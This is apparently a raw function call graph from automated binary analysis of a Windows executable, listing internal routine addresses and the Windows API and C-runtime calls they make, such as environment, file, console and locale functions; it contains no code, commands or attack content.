1cb6d7 119369->119370 119445 2c238c 80 API calls 119369->119445 119371 1cb717 119373 2c1fde 119372->119373 119379 2c1ffd 119373->119379 119479 2cd776 62 API calls 119373->119479 119376 2c90de 58 API calls 119376->119379 119377 2be832 58 API calls 119377->119379 119378 2c5b1e 8 API calls 119378->119379 119379->119376 119379->119377 119379->119378 119381 2c5cba 58 API calls 119379->119381 119383 2c202a 119379->119383 119384 2c20ce 119379->119384 119386 2c205e 119379->119386 119449 2c7307 119379->119449 119480 2cd776 62 API calls 119379->119480 119481 2cd9fb 63 API calls 119379->119481 119381->119379 119383->119346 119384->119383 119385 2c9126 58 API calls 119384->119385 119388 2c20e2 119385->119388 119387 2be832 58 API calls 119386->119387 119387->119383 119388->119383 119482 2cd9fb 63 API calls 119388->119482 119390 2c2109 119390->119386 119391 2c212e 119390->119391 119392 2c8f5f 58 API calls 119391->119392 119393 2c2138 119392->119393 119395 2be832 58 API calls 119393->119395 119397 2c2158 119393->119397 119394 2c2183 119483 2c21ad LeaveCriticalSection 119394->119483 119395->119397 119397->119394 119398 2be832 58 API calls 119397->119398 119398->119394 119400 1cd7bf 119399->119400 119402 1cd8b2 119400->119402 119841 1cba00 GetEnvironmentVariableA 119400->119841 119404 2c0dc6 125 API calls 119402->119404 119407 1cd8f4 119402->119407 119404->119407 119405 1cd835 119408 2be832 58 API calls 119405->119408 119421 1cdc44 119407->119421 119858 1cddc0 119407->119858 119408->119402 119410 2c0dc6 125 API calls 119412 1cd828 119410->119412 119414 1cd82f 119412->119414 119415 1cd83a GetModuleFileNameA 119412->119415 119413 2be5e7 6 API calls 119417 1cb667 119413->119417 119416 2c0e47 83 API calls 119414->119416 119415->119405 119422 1cd854 119415->119422 119416->119405 119417->119351 119417->119352 119418 1cd91b 119419 1cdc25 119418->119419 119423 1cddc0 77 API calls 119418->119423 119426 2bfd90 58 API calls 119418->119426 119427 2bf2ff 61 API calls 119418->119427 119428 1cdc1f 119418->119428 119431 2be832 58 API calls 119418->119431 119432 1c1a10 83 API calls 119418->119432 119871 1c5af0 65 API calls 119418->119871 119420 2c0e47 83 API calls 119419->119420 119419->119421 119420->119421 119421->119413 119422->119405 119424 1cf6a0 83 API calls 119422->119424 119423->119418 119425 1cd8a1 119424->119425 119425->119405 119426->119418 119427->119418 119429 2be832 58 API calls 119428->119429 119429->119419 119431->119418 119432->119418 119434 2c4d2d 119433->119434 119435 2c4d50 119433->119435 119434->119435 119437 2c4d33 119434->119437 120056 2c4d68 65 API calls 119435->120056 120054 2be62a 58 API calls 119437->120054 119438 2c4d63 119438->119347 119440 2c4d38 120055 2c5b0e 9 API calls 119440->120055 119442 2c4d43 119442->119347 119443->119356 119444->119355 119445->119369 119446->119363 119447->119367 119448->119371 119450 2c7313 119449->119450 119451 2c731e 119450->119451 119452 2c7335 119450->119452 119523 2be62a 58 API calls 119451->119523 119453 2c5cba 58 API calls 119452->119453 119455 2c733a 119453->119455 119484 2c61bd 119455->119484 119456 2c7323 119524 2c5b0e 9 API calls 119456->119524 119459 2c7344 119460 2c90de 58 API calls 119459->119460 119461 2c7357 119460->119461 119462 2c732e 119461->119462 119463 2c8f5f 58 API calls 119461->119463 119462->119379 119464 2c736d 119463->119464 119499 2c743d 119464->119499 119469 2c73a5 119471 2c8f5f 58 API calls 119469->119471 119470 2c7457 119528 2c5fc3 58 API calls 119470->119528 119473 2c73cf 119471->119473 119525 2c623d 58 API calls 119473->119525 119475 2c7406 119527 2c744c LeaveCriticalSection 119475->119527 119476 2c73e1 119476->119475 119526 2c623d 58 API calls 119476->119526 119479->119379 119480->119379 119481->119379 119482->119390 119483->119383 119485 2c61c9 119484->119485 119486 2c5cba 58 API calls 119485->119486 119487 2c61d2 119486->119487 119488 2c6201 119487->119488 119490 2c61e5 119487->119490 119489 2c8f5f 58 API calls 119488->119489 119491 2c6208 119489->119491 119492 2c5cba 58 API calls 119490->119492 119530 2c623d 58 API calls 119491->119530 119497 2c61ea 119492->119497 119494 2c621c 119531 2c6234 LeaveCriticalSection 119494->119531 119496 2c61f8 119496->119459 119497->119496 119529 2c4142 58 API calls 119497->119529 119532 2c90c9 LeaveCriticalSection 119499->119532 119501 2c7389 119502 2c75f1 119501->119502 119503 2c761a 119502->119503 119506 2c7639 119502->119506 119508 2c7626 119503->119508 119619 2c787a 84 API calls 119503->119619 119505 2c77bd 119533 2c6fd1 119505->119533 119506->119505 119512 2c77a9 119506->119512 119516 2c7675 119506->119516 119509 2be5e7 6 API calls 119508->119509 119511 2c7395 119509->119511 119511->119469 119511->119470 119512->119508 119577 2c7484 119512->119577 119513 2c77d9 119513->119508 119513->119512 119630 2c787a 84 API calls 119513->119630 119516->119508 119516->119512 119517 2c786d 119516->119517 119518 2c7868 119516->119518 119620 2d5f32 119516->119620 119629 2c787a 84 API calls 119516->119629 119519 2c5b1e 8 API calls 119517->119519 119631 2bff5a 6 API calls 119518->119631 119522 2c7879 119519->119522 119523->119456 119524->119462 119525->119476 119526->119475 119527->119462 119528->119462 119530->119494 119531->119497 119532->119501 119534 2c5cba 58 API calls 119533->119534 119535 2c7004 119534->119535 119536 2d5f32 58 API calls 119535->119536 119548 2c7034 119535->119548 119538 2c705e 119536->119538 119537 2be5e7 6 API calls 119539 2c7043 119537->119539 119540 2c7178 119538->119540 119542 2c7075 119538->119542 119546 2c709e 119538->119546 119539->119513 119541 2c5b1e 8 API calls 119540->119541 119543 2c72c7 119541->119543 119730 2d0a98 58 API calls 119542->119730 119545 2c7089 119545->119540 119545->119548 119550 2c7241 119546->119550 119632 2c6e79 119546->119632 119548->119537 119550->119540 119734 2d0a98 58 API calls 119550->119734 119551 2c717d 119732 2d71df IsValidLocale 119551->119732 119552 2c7119 119642 2d6da3 119552->119642 119553 2c7120 119682 2d65b9 119553->119682 119558 2c711e 119558->119551 119560 2c712c 119558->119560 119559 2c7189 119561 2c728b 119559->119561 119733 2d7185 GetLocaleInfoW 119559->119733 119561->119540 119565 2d5f32 58 API calls 119561->119565 119564 2c71a6 119566 2c71b7 GetACP 119564->119566 119568 2c71c3 119564->119568 119565->119540 119566->119568 119567 2c716d 119567->119540 119567->119550 119571 2d5f32 58 API calls 119567->119571 119569 2d5f32 58 API calls 119568->119569 119572 2c71e1 119569->119572 119571->119550 119572->119540 119574 2d5f32 58 API calls 119572->119574 119575 2c71f7 119574->119575 119575->119540 119576 2d5f32 58 API calls 119575->119576 119576->119567 119578 2c9126 58 API calls 119577->119578 119579 2c749c 119578->119579 119606 2c757f 119579->119606 119781 2c72c8 119579->119781 119581 2c74d0 119583 2c75e4 119581->119583 119586 2c72c8 84 API calls 119581->119586 119588 2c7548 119581->119588 119816 2d0a2c 119581->119816 119584 2c5b1e 8 API calls 119583->119584 119585 2c75f0 119584->119585 119587 2c761a 119585->119587 119596 2c7639 119585->119596 119586->119581 119604 2c7626 119587->119604 119825 2c787a 84 API calls 119587->119825 119589 2c754e 119588->119589 119590 2c7598 119588->119590 119599 2be832 58 API calls 119589->119599 119600 2c7568 119589->119600 119597 2be832 58 API calls 119590->119597 119592 2c77bd 119595 2c6fd1 84 API calls 119592->119595 119593 2c7484 84 API calls 119593->119604 119594 2be5e7 6 API calls 119598 2c7864 119594->119598 119608 2c77d9 119595->119608 119596->119592 119609 2c77a9 119596->119609 119618 2c7675 119596->119618 119601 2c759e 119597->119601 119598->119508 119599->119600 119603 2be832 58 API calls 119600->119603 119600->119606 119602 2c75b9 119601->119602 119605 2be832 58 API calls 119601->119605 119602->119606 119607 2be832 58 API calls 119602->119607 119603->119606 119604->119594 119605->119602 119606->119508 119607->119606 119608->119604 119608->119609 119827 2c787a 84 API calls 119608->119827 119609->119593 119609->119604 119611 2d5f32 58 API calls 119611->119618 119612 2c786d 119614 2c5b1e 8 API calls 119612->119614 119613 2c7868 119828 2bff5a 6 API calls 119613->119828 119617 2c7879 119614->119617 119618->119604 119618->119609 119618->119611 119618->119612 119618->119613 119826 2c787a 84 API calls 119618->119826 119619->119508 119621 2d5f40 119620->119621 119623 2d5f49 119621->119623 119624 2d5f44 119621->119624 119627 2d5f83 119621->119627 119623->119516 119624->119623 119838 2be62a 58 API calls 119624->119838 119625 2d5f74 119839 2c5b0e 9 API calls 119625->119839 119627->119623 119840 2be62a 58 API calls 119627->119840 119629->119516 119630->119513 119631->119517 119634 2c6e91 119632->119634 119633 2c6e9f 119633->119551 119633->119552 119633->119553 119634->119633 119635 2c6eb6 119634->119635 119638 2c6edb 119634->119638 119636 2d5f32 58 API calls 119635->119636 119637 2c6ec7 119636->119637 119637->119633 119639 2c5b1e 8 API calls 119637->119639 119638->119633 119638->119637 119641 2d5f32 58 API calls 119638->119641 119640 2c6fa4 119639->119640 119641->119638 119643 2c5cba 58 API calls 119642->119643 119644 2d6dca 119643->119644 119645 2c5cba 58 API calls 119644->119645 119650 2d6de6 119645->119650 119646 2d6df3 GetUserDefaultLCID 119652 2d6e91 119646->119652 119648 2d6e29 119649 2d6e9e 119648->119649 119651 2d6e3c 119648->119651 119649->119646 119655 2d6ea9 119649->119655 119650->119646 119650->119648 119735 2d654f 119650->119735 119654 2d6e52 119651->119654 119658 2d6e47 119651->119658 119676 2d6fa4 119652->119676 119744 2d6c8c 62 API calls 119652->119744 119740 2d68ea 59 API calls 119654->119740 119743 2d682d 59 API calls 119655->119743 119657 2be5e7 6 API calls 119662 2d6fbb 119657->119662 119739 2d686d 59 API calls 119658->119739 119661 2d6ee8 119665 2d6f0c IsValidCodePage 119661->119665 119661->119676 119662->119558 119664 2d6e50 119664->119652 119666 2d654f 60 API calls 119664->119666 119667 2d6f1e IsValidLocale 119665->119667 119665->119676 119669 2d6e74 119666->119669 119668 2d6f2d 119667->119668 119667->119676 119669->119652 119676->119657 119683 2c5cba 58 API calls 119682->119683 119684 2d65c5 119683->119684 119685 2d65fe 119684->119685 119686 2d654f 60 API calls 119684->119686 119687 2d660b 119685->119687 119688 2d6651 119685->119688 119686->119685 119689 2d6619 119687->119689 119690 2d6612 119687->119690 119753 2d6032 119688->119753 119694 2d611f EnumSystemLocalesW 119689->119694 119764 2d60ab EnumSystemLocalesW 119690->119764 119693 2d6648 119696 2d675f 119693->119696 119766 2d646e 61 API calls 119693->119766 119695 2d6617 119694->119695 119695->119693 119697 2d654f 60 API calls 119695->119697 119696->119558 119699 2d6632 119697->119699 119699->119693 119701 2d664a 119699->119701 119702 2d6643 119699->119702 119700 2d666f 119700->119696 119703 2d6693 IsValidCodePage 119700->119703 119749 2d611f 119701->119749 119765 2d60ab EnumSystemLocalesW 119702->119765 119703->119696 119730->119545 119732->119559 119733->119564 119734->119561 119736 2d65ad 119735->119736 119738 2d6560 119735->119738 119736->119648 119738->119736 119748 2da21e 60 API calls 119738->119748 119739->119664 119740->119664 119743->119652 119744->119661 119748->119738 119775 2d71b4 119753->119775 119755 2d608f 119756 2be5e7 6 API calls 119755->119756 119758 2d609a 119756->119758 119757 2d605e 119757->119755 119759 2d5f32 58 API calls 119757->119759 119758->119693 119760 2d6088 119759->119760 119760->119755 119761 2d609e 119760->119761 119762 2c5b1e 8 API calls 119761->119762 119764->119695 119765->119693 119766->119700 119776 2d71ce GetUserDefaultLCID 119775->119776 119777 2d71ca 119775->119777 119780 2d708e 58 API calls 119776->119780 119777->119757 119779 2d71da 119779->119757 119780->119779 119782 2c72f7 119781->119782 119784 2c72d6 119781->119784 119782->119581 119783 2d0a2c 58 API calls 119783->119784 119784->119782 119784->119783 119785 2c72fc 119784->119785 119786 2c5b1e 8 API calls 119785->119786 119787 2c7306 119786->119787 119788 2c731e 119787->119788 119789 2c7335 119787->119789 119829 2be62a 58 API calls 119788->119829 119790 2c5cba 58 API calls 119789->119790 119792 2c733a 119790->119792 119794 2c61bd 58 API calls 119792->119794 119793 2c7323 119830 2c5b0e 9 API calls 119793->119830 119796 2c7344 119794->119796 119797 2c90de 58 API calls 119796->119797 119798 2c7357 119797->119798 119799 2c732e 119798->119799 119800 2c8f5f 58 API calls 119798->119800 119799->119581 119801 2c736d 119800->119801 119802 2c743d LeaveCriticalSection 119801->119802 119803 2c7389 119802->119803 119804 2c75f1 84 API calls 119803->119804 119805 2c7395 119804->119805 119806 2c73a5 119805->119806 119807 2c7457 119805->119807 119817 2d0a38 119816->119817 119818 2d0a46 119816->119818 119817->119818 119822 2d0a72 119817->119822 119835 2be62a 58 API calls 119818->119835 119821 2d0a5a 119821->119581 119822->119821 119837 2be62a 58 API calls 119822->119837 119824 2d0a50 119836 2c5b0e 9 API calls 119824->119836 119825->119604 119826->119618 119827->119608 119828->119612 119829->119793 119830->119799 119835->119824 119836->119821 119837->119824 119838->119625 119839->119623 119840->119625 119842 1cba47 GetEnvironmentVariableA 119841->119842 119843 1cba31 119841->119843 119844 1cba73 119842->119844 119845 1cba64 119842->119845 119843->119842 119872 2da5e9 58 API calls 119843->119872 119851 1cba96 119844->119851 119874 1cb930 60 API calls 119844->119874 119845->119844 119873 2da5e9 58 API calls 119845->119873 119848 1cba40 119848->119842 119848->119851 119850 1cba86 119850->119851 119875 1cb930 60 API calls 119850->119875 119852 2be5e7 6 API calls 119851->119852 119854 1cbaa4 119852->119854 119854->119402 119854->119405 119855 1cf6a0 119854->119855 119856 1cec90 83 API calls 119855->119856 119857 1cd819 119856->119857 119857->119410 119859 1cddca 119858->119859 119861 1cde80 119859->119861 119865 1cdea3 119859->119865 119869 1cde9d 119859->119869 119876 2bf382 119859->119876 119895 2da5e9 58 API calls 119859->119895 119896 2bf7f9 61 API calls 119859->119896 119862 2be5e7 6 API calls 119861->119862 119864 1cde96 119862->119864 119864->119418 119866 2be5e7 6 API calls 119865->119866 119867 1cdeb9 119866->119867 119867->119418 119870 2be832 58 API calls 119869->119870 119870->119865 119871->119418 119872->119848 119873->119844 119874->119850 119875->119851 119878 2bf38e 119876->119878 119877 2bf3a1 119917 2be62a 58 API calls 119877->119917 119878->119877 119880 2bf3d2 119878->119880 119883 2bfa4e 59 API calls 119880->119883 119885 2bf3b1 119880->119885 119881 2bf3a6 119918 2c5b0e 9 API calls 119881->119918 119884 2bf3e1 119883->119884 119887 2c49ac 58 API calls 119884->119887 119889 2bf457 119884->119889 119885->119859 119886 2bf485 119921 2bf4b9 LeaveCriticalSection LeaveCriticalSection 119886->119921 119891 2bf3f2 119887->119891 119889->119886 119897 2c7d9d 119889->119897 119891->119889 119919 2be62a 58 API calls 119891->119919 119893 2bf44c 119920 2c5b0e 9 API calls 119893->119920 119895->119859 119896->119859 119898 2c7dbd 119897->119898 119899 2c7da8 119897->119899 119903 2c7df2 119898->119903 119904 2d72c4 58 API calls 119898->119904 119911 2c7db8 119898->119911 119955 2be62a 58 API calls 119899->119955 119901 2c7dad 119956 2c5b0e 9 API calls 119901->119956 119905 2c49ac 58 API calls 119903->119905 119904->119903 119906 2c7e06 119905->119906 119922 2c8480 119906->119922 119908 2c7e0d 119909 2c49ac 58 API calls 119908->119909 119908->119911 119910 2c7e30 119909->119910 119910->119911 119912 2c49ac 58 API calls 119910->119912 119911->119889 119913 2c7e3c 119912->119913 119913->119911 119914 2c49ac 58 API calls 119913->119914 119915 2c7e49 119914->119915 119916 2c49ac 58 API calls 119915->119916 119916->119911 119917->119881 119918->119885 119919->119893 119920->119889 119921->119885 119923 2c848c 119922->119923 119924 2c8499 119923->119924 119925 2c84b0 119923->119925 120025 2be5f6 58 API calls 119924->120025 119926 2c8574 119925->119926 119928 2c84c4 119925->119928 120033 2be5f6 58 API calls 119926->120033 119931 2c84ef 119928->119931 119932 2c84e2 119928->119932 119930 2c849e 120026 2be62a 58 API calls 119930->120026 119936 2c84fc 119931->119936 119937 2c8511 119931->119937 120027 2be5f6 58 API calls 119932->120027 119933 2c84e7 120034 2be62a 58 API calls 119933->120034 120028 2be5f6 58 API calls 119936->120028 119940 2c0936 59 API calls 119937->119940 119938 2c84a5 119938->119908 119943 2c8517 119940->119943 119942 2c8501 120029 2be62a 58 API calls 119942->120029 119946 2c853d 119943->119946 119947 2c852a 119943->119947 119944 2c8509 120035 2c5b0e 9 API calls 119944->120035 120030 2be62a 58 API calls 119946->120030 119957 2c8594 119947->119957 119951 2c8536 120032 2c856c LeaveCriticalSection 119951->120032 119952 2c8542 120031 2be5f6 58 API calls 119952->120031 119955->119901 119956->119911 119958 2c85cc 119957->119958 119959 2c85b5 119957->119959 119961 2c8d04 119958->119961 119964 2c8606 119958->119964 120036 2be5f6 58 API calls 119959->120036 120051 2be5f6 58 API calls 119961->120051 119963 2c85ba 120037 2be62a 58 API calls 119963->120037 119967 2c860e 119964->119967 119975 2c8625 119964->119975 119965 2c8d09 120052 2be62a 58 API calls 119965->120052 120038 2be5f6 58 API calls 119967->120038 119970 2c861a 120053 2c5b0e 9 API calls 119970->120053 119971 2c85c1 119971->119951 119972 2c8613 120039 2be62a 58 API calls 119972->120039 119974 2c863a 120040 2be5f6 58 API calls 119974->120040 119975->119971 119975->119974 119978 2c8654 119975->119978 119979 2c8672 119975->119979 119978->119974 119980 2c865f 119978->119980 119981 2c9126 58 API calls 119979->119981 119983 2d73d2 58 API calls 119980->119983 119982 2c8682 119981->119982 119984 2c868a 119982->119984 119985 2c86a5 119982->119985 119986 2c8773 119983->119986 120041 2be62a 58 API calls 119984->120041 120043 2c08c3 60 API calls 119985->120043 119988 2c87ec ReadFile 119986->119988 119993 2c8789 GetConsoleMode 119986->119993 119991 2c8ccc GetLastError 119988->119991 119992 2c880e 119988->119992 119990 2c868f 120042 2be5f6 58 API calls 119990->120042 119997 2c8cd9 119991->119997 119998 2c87cc 119991->119998 119992->119991 120001 2c87de 119992->120001 119994 2c879d 119993->119994 119995 2c87e9 119993->119995 119994->119995 119999 2c87a3 ReadConsoleW 119994->119999 119995->119988 120049 2be62a 58 API calls 119997->120049 120007 2c87d2 119998->120007 120044 2be609 58 API calls 119998->120044 119999->120001 120002 2c87c6 GetLastError 119999->120002 120001->120007 120008 2c8843 120001->120008 120009 2c8ab0 120001->120009 120002->119998 120004 2c8cde 120050 2be5f6 58 API calls 120004->120050 120006 2be832 58 API calls 120006->119971 120007->119971 120007->120006 120011 2c88af ReadFile 120008->120011 120017 2c8930 120008->120017 120009->120007 120015 2c8bb6 ReadFile 120009->120015 120012 2c88d0 GetLastError 120011->120012 120023 2c88da 120011->120023 120012->120023 120013 2c89ed 120019 2c899d MultiByteToWideChar 120013->120019 120047 2c08c3 60 API calls 120013->120047 120014 2c89dd 120046 2be62a 58 API calls 120014->120046 120016 2c8bd9 GetLastError 120015->120016 120024 2c8be7 120015->120024 120016->120024 120017->120007 120017->120013 120017->120014 120017->120019 120019->120002 120019->120007 120023->120008 120045 2c08c3 60 API calls 120023->120045 120024->120009 120048 2c08c3 60 API calls 120024->120048 120025->119930 120026->119938 120027->119933 120028->119942 120029->119944 120030->119952 120031->119951 120032->119938 120033->119933 120034->119944 120035->119938 120036->119963 120037->119971 120038->119972 120039->119970 120040->119972 120041->119990 120042->119971 120043->119980 120044->120007 120045->120023 120046->120007 120047->120019 120048->120024 120049->120004 120050->120007 120051->119965 120052->119970 120053->119971 120054->119440 120055->119442 120056->119438 120057 2c259d 120059 2c25a9 120057->120059 120092 2c6aa7 GetProcessHeap 120059->120092 120060 2c25fe 120063 2c2609 120060->120063 120188 2c26f1 58 API calls 120060->120188 120093 2c5df4 120063->120093 120064 2c260f 120065 2c261a 120064->120065 120189 2c26f1 58 API calls 120064->120189 120114 2c80b4 120065->120114 120068 2c2629 120069 2c2635 GetCommandLineA 120068->120069 120190 2c26f1 58 API calls 120068->120190 120133 2ceeab GetEnvironmentStringsW 120069->120133 120072 2c2634 120072->120069 120076 2c265a 120157 2ceca1 120076->120157 120079 2c2660 120080 2c266b 120079->120080 120192 2c4142 58 API calls 120079->120192 120173 2c417c 120080->120173 120083 2c2673 120084 2c267e 120083->120084 120193 2c4142 58 API calls 120083->120193 120179 1cbc60 120084->120179 120092->120060 120195 2c4214 36 API calls 120093->120195 120095 2c5df9 120196 2c9090 InitializeCriticalSectionAndSpinCount 120095->120196 120097 2c5dfe 120098 2c5e02 120097->120098 120198 2cb739 TlsAlloc 120097->120198 120197 2c5e6a 61 API calls 120098->120197 120101 2c5e07 120101->120064 120102 2c5e14 120102->120098 120103 2c5e1f 120102->120103 120104 2c90de 58 API calls 120103->120104 120105 2c5e2c 120104->120105 120106 2c5e61 120105->120106 120199 2cb795 TlsSetValue 120105->120199 120200 2c5e6a 61 API calls 120106->120200 120109 2c5e40 120109->120106 120111 2c5e46 120109->120111 120110 2c5e66 120110->120064 120112 2c5d41 58 API calls 120111->120112 120113 2c5e4e GetCurrentThreadId 120112->120113 120113->120064 120115 2c80c0 120114->120115 120116 2c8f5f 58 API calls 120115->120116 120117 2c80c7 120116->120117 120118 2c90de 58 API calls 120117->120118 120119 2c80d8 120118->120119 120120 2c8143 GetStartupInfoW 120119->120120 120121 2c80e3 120119->120121 120127 2c8158 120120->120127 120130 2c8287 120120->120130 120121->120068 120122 2c834f 120203 2c835f LeaveCriticalSection 120122->120203 120124 2c90de 58 API calls 120124->120127 120125 2c82d4 GetStdHandle 120125->120130 120126 2c82e7 GetFileType 120126->120130 120127->120124 120128 2c81a6 120127->120128 120127->120130 120129 2c81da GetFileType 120128->120129 120128->120130 120201 2cb7b7 InitializeCriticalSectionAndSpinCount 120128->120201 120129->120128 120130->120122 120130->120125 120130->120126 120202 2cb7b7 InitializeCriticalSectionAndSpinCount 120130->120202 120134 2ceebe WideCharToMultiByte 120133->120134 120135 2c2645 120133->120135 120137 2cef28 FreeEnvironmentStringsW 120134->120137 120138 2ceef1 120134->120138 120146 2cea72 120135->120146 120137->120135 120139 2c9126 58 API calls 120138->120139 120140 2ceef7 120139->120140 120140->120137 120141 2ceefe WideCharToMultiByte 120140->120141 120142 2cef1d FreeEnvironmentStringsW 120141->120142 120143 2cef14 120141->120143 120142->120135 120144 2be832 58 API calls 120143->120144 120145 2cef1a 120144->120145 120145->120142 120147 2cea85 GetModuleFileNameA 120146->120147 120148 2cea80 120146->120148 120150 2ceab2 120147->120150 120210 2c6288 62 API calls 120148->120210 120204 2ceb25 120150->120204 120153 2c9126 58 API calls 120154 2ceaeb 120153->120154 120155 2ceb25 58 API calls 120154->120155 120156 2c264f 120154->120156 120155->120156 120156->120076 120191 2c4142 58 API calls 120156->120191 120158 2cecaa 120157->120158 120161 2cecaf 120157->120161 120213 2c6288 62 API calls 120158->120213 120160 2cecbd 120160->120079 120161->120160 120162 2c90de 58 API calls 120161->120162 120169 2cece5 120162->120169 120163 2ced37 120164 2be832 58 API calls 120163->120164 120164->120160 120165 2c90de 58 API calls 120165->120169 120166 2ced5e 120167 2be832 58 API calls 120166->120167 120167->120160 120169->120160 120169->120163 120169->120165 120169->120166 120170 2ced75 120169->120170 120214 2cd17b 58 API calls 120169->120214 120171 2c5b1e 8 API calls 120170->120171 120172 2ced81 120171->120172 120172->120079 120176 2c4188 120173->120176 120175 2c41a6 120178 2c41c5 120175->120178 120218 2d03cc 67 API calls 120175->120218 120215 2d03e1 120176->120215 120178->120083 120180 1cbc70 120179->120180 120219 1cbab0 120180->120219 120188->120063 120189->120065 120190->120072 120195->120095 120196->120097 120197->120101 120198->120102 120199->120109 120200->120110 120201->120128 120202->120130 120203->120121 120206 2ceb47 120204->120206 120208 2cebab 120206->120208 120211 2d7fea 58 API calls 120206->120211 120207 2ceac8 120207->120153 120207->120156 120208->120207 120212 2d7fea 58 API calls 120208->120212 120210->120147 120211->120206 120212->120208 120213->120161 120214->120169 120216 2d03e4 EncodePointer 120215->120216 120216->120216 120217 2d03fe 120216->120217 120217->120175 120218->120178 120409 228610 120410 22861b 120409->120410 120411 22867c 120409->120411 120410->120411 120412 2be832 58 API calls 120410->120412 120412->120410 120413 1d578e 120414 1d6550 84 API calls 120413->120414 120416 1d4bb0 120413->120416 120414->120416 120415 1e6210 89 API calls 120415->120416 120416->120415 120417 1d3850 83 API calls 120416->120417 120418 1d58b9 120416->120418 120421 1d58ac 120416->120421 120425 1d4c4a 120416->120425 120427 1d67d0 GetTickCount64 120416->120427 120428 1d9330 113 API calls 120416->120428 120417->120416 120429 1d3960 83 API calls 120418->120429 120424 1d3960 83 API calls 120424->120425 120425->120416 120425->120424 120426 1dcfe0 GetTickCount64 120425->120426 120426->120425 120427->120416 120428->120416 120429->120421 120430 1c930a 120431 1c9316 120430->120431 120432 1c9347 120431->120432 120488 1c1a10 83 API calls 120431->120488 120477 1c19f0 120432->120477 120436 2c4d21 65 API calls 120437 1c9364 120436->120437 120438 1c936b ioctlsocket 120437->120438 120444 1c93a8 120437->120444 120439 1c938c 120438->120439 120438->120444 120489 2be62a 58 API calls 120439->120489 120441 1c9391 120490 2c19b6 58 API calls 120441->120490 120443 1c9398 120491 1c1a10 83 API calls 120443->120491 120446 2c49ac 58 API calls 120444->120446 120449 1c9408 120444->120449 120447 1c93ff 120446->120447 120448 2d73d2 58 API calls 120447->120448 120448->120449 120450 1cf8e0 83 API calls 120449->120450 120451 1c9458 120450->120451 120453 1c9475 120451->120453 120492 1cf8c0 83 API calls 120451->120492 120482 1cf7a0 120453->120482 120455 2c0e47 83 API calls 120460 1c8cd3 120455->120460 120456 2c49ac 58 API calls 120456->120460 120457 1cf8e0 83 API calls 120457->120460 120458 2be832 58 API calls 120458->120460 120459 2cbfe2 63 API calls 120459->120460 120460->120455 120460->120456 120460->120457 120460->120458 120460->120459 120462 1cb45d 120460->120462 120472 2c4d21 65 API calls 120460->120472 120485 1c26a0 83 API calls 120460->120485 120486 1c1b70 83 API calls 120460->120486 120487 2da5e9 58 API calls 120460->120487 120493 1c2610 58 API calls 120460->120493 120463 2be832 58 API calls 120462->120463 120464 1cb46b 120462->120464 120463->120464 120466 1cb47e 120464->120466 120494 1c2610 58 API calls 120464->120494 120467 2be832 58 API calls 120466->120467 120468 1cb48f 120467->120468 120471 2be832 58 API calls 120468->120471 120474 1cb4b0 120471->120474 120472->120460 120475 2be832 58 API calls 120474->120475 120476 1cb4d1 120475->120476 120478 2c49ac 58 API calls 120477->120478 120479 1c19fb 120478->120479 120495 2c49fa 120479->120495 120481 1c1a04 120481->120436 120483 1cec90 83 API calls 120482->120483 120484 1cf7dd 120483->120484 120484->120460 120485->120460 120486->120460 120487->120460 120488->120432 120489->120441 120490->120443 120491->120444 120492->120453 120493->120460 120494->120466 120496 2c4a06 120495->120496 120497 2c4a45 120496->120497 120503 2c4a35 120496->120503 120498 2c4a4d 120497->120498 120500 2c4a5d 120497->120500 120515 2be62a 58 API calls 120498->120515 120501 2c4ae6 120500->120501 120505 2c4a8e 120500->120505 120518 2be62a 58 API calls 120501->120518 120514 2be62a 58 API calls 120503->120514 120504 2c4a3a 120519 2c5b0e 9 API calls 120504->120519 120507 2c0936 59 API calls 120505->120507 120509 2c4a94 120507->120509 120512 2c4aaa 120509->120512 120516 2be62a 58 API calls 120509->120516 120510 2c4a52 120510->120481 120517 2c4ade LeaveCriticalSection 120512->120517 120514->120504 120515->120510 120516->120512 120517->120510 120518->120504 120519->120510 120520 272930 120535 241ff0 120520->120535 120522 27293f 120523 272945 120522->120523 120524 2729a4 120522->120524 120573 213020 7 API calls 120523->120573 120576 2729d0 124 API calls 120524->120576 120527 2729b3 120528 27294a 120529 272974 120528->120529 120530 27298c 120528->120530 120574 212b50 7 API calls 120529->120574 120575 212b50 7 API calls 120530->120575 120533 272985 120534 27299d 120536 242010 120535->120536 120536->120536 120537 242017 MultiByteToWideChar 120536->120537 120538 24203f GetLastError 120537->120538 120539 24207b 120537->120539 120540 24204c MultiByteToWideChar 120538->120540 120541 24206e GetLastError 120538->120541 120542 242083 MultiByteToWideChar 120539->120542 120540->120539 120540->120541 120572 2420f5 120541->120572 120543 24214f GetLastError 120542->120543 120544 2420a6 MultiByteToWideChar 120542->120544 120584 212b50 7 API calls 120543->120584 120544->120543 120551 2420d1 120544->120551 120546 2c0dc6 125 API calls 120548 242101 120546->120548 120547 24216d 120585 2be62a 58 API calls 120547->120585 120548->120543 120550 24210a 120548->120550 120582 217900 7 API calls 120550->120582 120577 2c48cd 120551->120577 120556 242114 120558 242128 120556->120558 120559 24211b 120556->120559 120557 242190 120586 212b50 7 API calls 120557->120586 120583 217ed0 7 API calls 120558->120583 120560 2c0e47 83 API calls 120559->120560 120563 242120 120560->120563 120568 2be5e7 6 API calls 120563->120568 120564 2420eb 120564->120572 120581 2be62a 58 API calls 120564->120581 120565 242136 120567 2be5e7 6 API calls 120565->120567 120570 24214b 120567->120570 120571 2421d4 120568->120571 120570->120522 120571->120522 120572->120543 120572->120546 120573->120528 120574->120533 120575->120534 120576->120527 120587 2c48e2 120577->120587 120579 2420dd 120579->120550 120580 2be62a 58 API calls 120579->120580 120580->120564 120581->120572 120582->120556 120583->120565 120584->120547 120585->120557 120586->120563 120588 2c48ee 120587->120588 120589 2c4901 120588->120589 120592 2c4932 120588->120592 120621 2be62a 58 API calls 120589->120621 120591 2c4906 120622 2c5b0e 9 API calls 120591->120622 120594 2cbaf7 61 API calls 120592->120594 120595 2c4937 120594->120595 120596 2c494d 120595->120596 120597 2c4940 120595->120597 120598 2c4977 120596->120598 120599 2c4957 120596->120599 120623 2be62a 58 API calls 120597->120623 120606 2d0638 120598->120606 120624 2be62a 58 API calls 120599->120624 120603 2c4911 120603->120579 120614 2d0658 120606->120614 120607 2d0672 120629 2be62a 58 API calls 120607->120629 120609 2d0677 120630 2c5b0e 9 API calls 120609->120630 120611 2c4982 120625 2c49a4 LeaveCriticalSection LeaveCriticalSection 120611->120625 120612 2d0890 120626 2cfc14 120612->120626 120614->120607 120620 2d082d 120614->120620 120631 2d8d89 60 API calls 120614->120631 120616 2d0826 120616->120620 120632 2d8d89 60 API calls 120616->120632 120618 2d0845 120618->120620 120633 2d8d89 60 API calls 